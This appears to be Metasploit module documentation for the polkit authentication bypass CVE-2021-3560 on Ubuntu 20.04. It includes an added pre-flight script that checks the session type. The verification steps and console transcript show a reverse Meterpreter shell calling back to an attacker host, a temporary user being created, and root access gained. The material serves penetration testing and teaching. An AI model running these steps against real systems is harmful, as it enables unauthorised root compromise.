Description
This module exploits an authentication bypass (CVE-2021-3560) in Linux systems that use the polkit system service. The vulnerability lets an unprivileged local user obtain a root shell on the system.
This exploit needs to be run from an SSH or other non-graphical session. The dbus-send command used to trigger the exploit causes polkit to launch an authentication agent. In a graphical session that agent appears as a dialog box and waits for user input, so the dbus-send call times out waiting for input and exploitation of polkit fails.
If systemd is installed on the system, the session type can be checked by running loginctl session-status (with no argument it reports the session the calling process belongs to, so run it from the session the payload will run in).
The following output (type x11) indicates a graphical session is in use and the exploit will not work:
Service: gdm-password; type x11; class user
The following output (type tty) indicates a non-graphical session is in use and the exploit is likely to succeed:
Service: sshd; type tty; class user
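The session-type check described above, written as a small pre-flight script. This is an added example, not code from the Metasploit module or its documentation; the loginctl sample outputs are constructed to match the two Service lines quoted above, and the preflight function is an assumption about what a tester would want to run on the target before launching the module.

```shell
#!/bin/sh
# Added example, not part of the Metasploit module or its documentation.
# Pre-flight checks for polkit_dbus_auth_bypass: decide from the loginctl
# session type whether dbus-send can be used without a graphical
# authentication agent swallowing the request. The sample outputs below
# are constructed to match the two Service lines in the description.

# Pull the session type (tty, x11, wayland, ...) out of `loginctl
# session-status` text read from stdin. Prints nothing if no Service line
# is present (e.g. the calling process is not in a logind session).
session_type() {
    sed -n 's/^.*Service: [^;]*; type \([^;]*\); class .*$/\1/p' | head -n 1
}

# Returns 0 when the exploit can run in a session of this type, 1 otherwise.
# Only tty is treated as usable: x11/wayland sessions launch a dialog agent,
# and an empty type means no logind session was found for the caller.
session_ok() {
    case "$1" in
        tty) return 0 ;;
        *)   return 1 ;;
    esac
}

# Live check for the session the payload is running in. Not executed at
# load time so the file can be sourced; call it from the target shell.
preflight() {
    st=$(loginctl session-status 2>/dev/null | session_type)
    if session_ok "$st"; then
        echo "session type '$st': non-graphical, dbus-send should not block"
    else
        echo "session type '${st:-none}': expect the auth agent to time out" >&2
        return 1
    fi
    command -v dbus-send >/dev/null 2>&1 || { echo "dbus-send missing" >&2; return 1; }
}

# Constructed samples: the SSH case and the GNOME display-manager case.
SAMPLE_TTY='3 - msf (1000)
           Since: Fri 2021-06-25 17:50:01 EDT; 5min ago
          Leader: 1234 (sshd)
          Remote: 192.168.123.1
         Service: sshd; type tty; class user
           State: active'

SAMPLE_X11='2 - msf (1000)
           Since: Fri 2021-06-25 17:40:12 EDT; 15min ago
          Leader: 987 (gdm-session-wor)
            Seat: seat0; vc7
         Display: :0
         Service: gdm-password; type x11; class user
           State: active'
```

Source the file in the target shell and call preflight before setting up the module; a non-zero exit means the module's dbus-send call will most likely hang on the agent dialog and the run should be moved to an SSH session.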
Vulnerable Application
This module has been tested successfully on:
- Ubuntu 20.04
Installation And Setup
Download and install Ubuntu 20.04 from the Ubuntu Downloads page: https://ubuntu.com/download/desktop. Do not apply package updates before testing; the policykit-1 security update that fixes this bug closes the bypass.
Verification Steps
- Start msfconsole.
- Get a session.
- Do: use exploit/linux/local/polkit_dbus_auth_bypass.
- Set the SESSION option to the session obtained in step 2.
- Set the LHOST, LPORT and PAYLOAD options as appropriate.
- Do: run.
- It is possible for the exploit to fail. If this happens, increase the value of the ITERATIONS option so the exploit is attempted more times before failing, and run it again.
- Enjoy the shell.
Options
- SESSION: The session to run this module on.
- USERNAME: The name of the user the exploit will add to the system (the user is removed again once the root session is obtained, as shown in the scenario below).
- PASSWORD: The password for the user to be created.
- WritableDir: Directory to write the payload file to (/tmp by default on Linux, as seen in the scenario below).
Scenarios
Tested on Ubuntu 20.04
msf6 > use multi/handler
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.146:49882) at 2021-06-25 17:54:45 -0400
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use polkit_dbus
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
Matching Modules
================
#  Name                                         Disclosure Date  Rank       Check  Description
-  ----                                         ---------------  ----       -----  -----------
0  exploit/linux/local/polkit_dbus_auth_bypass  2021-06-03       excellent  Yes    Polkit Authentication Bypass
Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/local/polkit_dbus_auth_bypass
[*] Using exploit/linux/local/polkit_dbus_auth_bypass
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set lport 4443
lport => 4443
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set session 1
session => 1
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > run
[*] Started reverse TCP handler on 192.168.123.1:4443
[*] Executing automatic check (disable AutoCheck to override)
[*] Checking for exploitability via attempt
[+] The target is vulnerable. The polkit framework instance is vulnerable.
[*] Attempting to create user msf
[+] User msf created with UID 1019
[*] Attempting to set the password of the newly create user, msf, to: NpJsQSti
[+] Obtained code execution as root!
[*] Writing '/tmp/vOWnn' (207 bytes) ...
[*] Sending stage (984904 bytes) to 192.168.123.146
[+] Deleted /tmp/vOWnn
[*] Meterpreter session 2 opened (192.168.123.1:4443 -> 192.168.123.146:42066) at 2021-06-25 17:55:27 -0400
[*] Attempting to remove the user added:
[+] Successfully removed msf
meterpreter > getuid
Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer : 192.168.123.146
OS : Ubuntu 20.04 (Linux 5.8.0-55-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux